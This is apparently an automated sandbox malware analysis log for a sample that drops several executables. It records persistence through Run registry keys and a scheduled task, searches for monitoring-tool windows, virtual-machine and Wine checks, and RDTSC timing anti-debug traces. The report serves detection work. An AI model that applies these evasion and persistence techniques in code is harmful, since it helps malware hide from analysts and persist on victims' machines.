                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 176986cc9c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 176986cc9c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f570600774.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f570600774.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3981530833.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3981530833.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 536e42fc8b.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 536e42fc8b.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9724
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111648E second address: 11164A5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F020CB28452h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11164A5 second address: 11164AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11164AB second address: 11164B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D4DC second address: 112D4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D7F7 second address: 112D7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D7FE second address: 112D809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D809 second address: 112D80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11314BC second address: 11314C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11314C0 second address: 11314E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007F020CB28449h 0x00000010 or cl, FFFFFFF5h 0x00000013 push 00000000h 0x00000015 movzx esi, si 0x00000018 call 00007F020CB28449h 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11314E7 second address: 11314FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F020CB267E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F020CB267E6h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11314FF second address: 113154A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jns 00007F020CB2844Eh 0x00000014 jbe 00007F020CB28448h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F020CB28459h 0x00000028 popad 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113154A second address: 1131561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267F3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131683 second address: 1131687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131687 second address: 113168B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113168B second address: 1131691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131691 second address: 1131696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131696 second address: 11316BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F020CB28456h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11316BE second address: 1131731 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F020CB267F6h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jng 00007F020CB267EAh 0x00000018 pop eax 0x00000019 js 00007F020CB267E8h 0x0000001f push 00000003h 0x00000021 mov esi, dword ptr [ebp+122D39A9h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a jg 00007F020CB267ECh 0x00000030 mov edx, dword ptr [ebp+122D36A1h] 0x00000036 pop ecx 0x00000037 push 00000003h 0x00000039 mov dword ptr [ebp+122D2CE8h], edi 0x0000003f push C1AE6900h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F020CB267F6h 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131731 second address: 113176F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB2844Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 01AE6900h 0x00000010 mov dword ptr [ebp+122D2E93h], eax 0x00000016 mov dword ptr [ebp+122D1E09h], ebx 0x0000001c lea ebx, dword ptr [ebp+124563CDh] 0x00000022 jl 00007F020CB28450h 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113176F second address: 1131773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131831 second address: 1131837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131837 second address: 113183B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151683 second address: 11516A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F020CB28446h 0x0000000a jmp 00007F020CB28457h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11199BC second address: 11199D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F020CB267E6h 0x00000008 jmp 00007F020CB267F2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F36E second address: 114F376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F776 second address: 114F7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F020CB267F4h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jne 00007F020CB26814h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F7CC second address: 114F7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F7D2 second address: 114F7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267F0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F020CB267E6h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FDBF second address: 114FDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FDC4 second address: 114FDC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FDC9 second address: 114FDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB2844Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jbe 00007F020CB2844Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FF2C second address: 114FF57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pushad 0x00000008 jmp 00007F020CB267F3h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FF57 second address: 114FF5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115058E second address: 1150596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150596 second address: 11505BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F020CB28446h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F020CB28456h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505BB second address: 11505D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505D4 second address: 11505E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505E0 second address: 11505E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
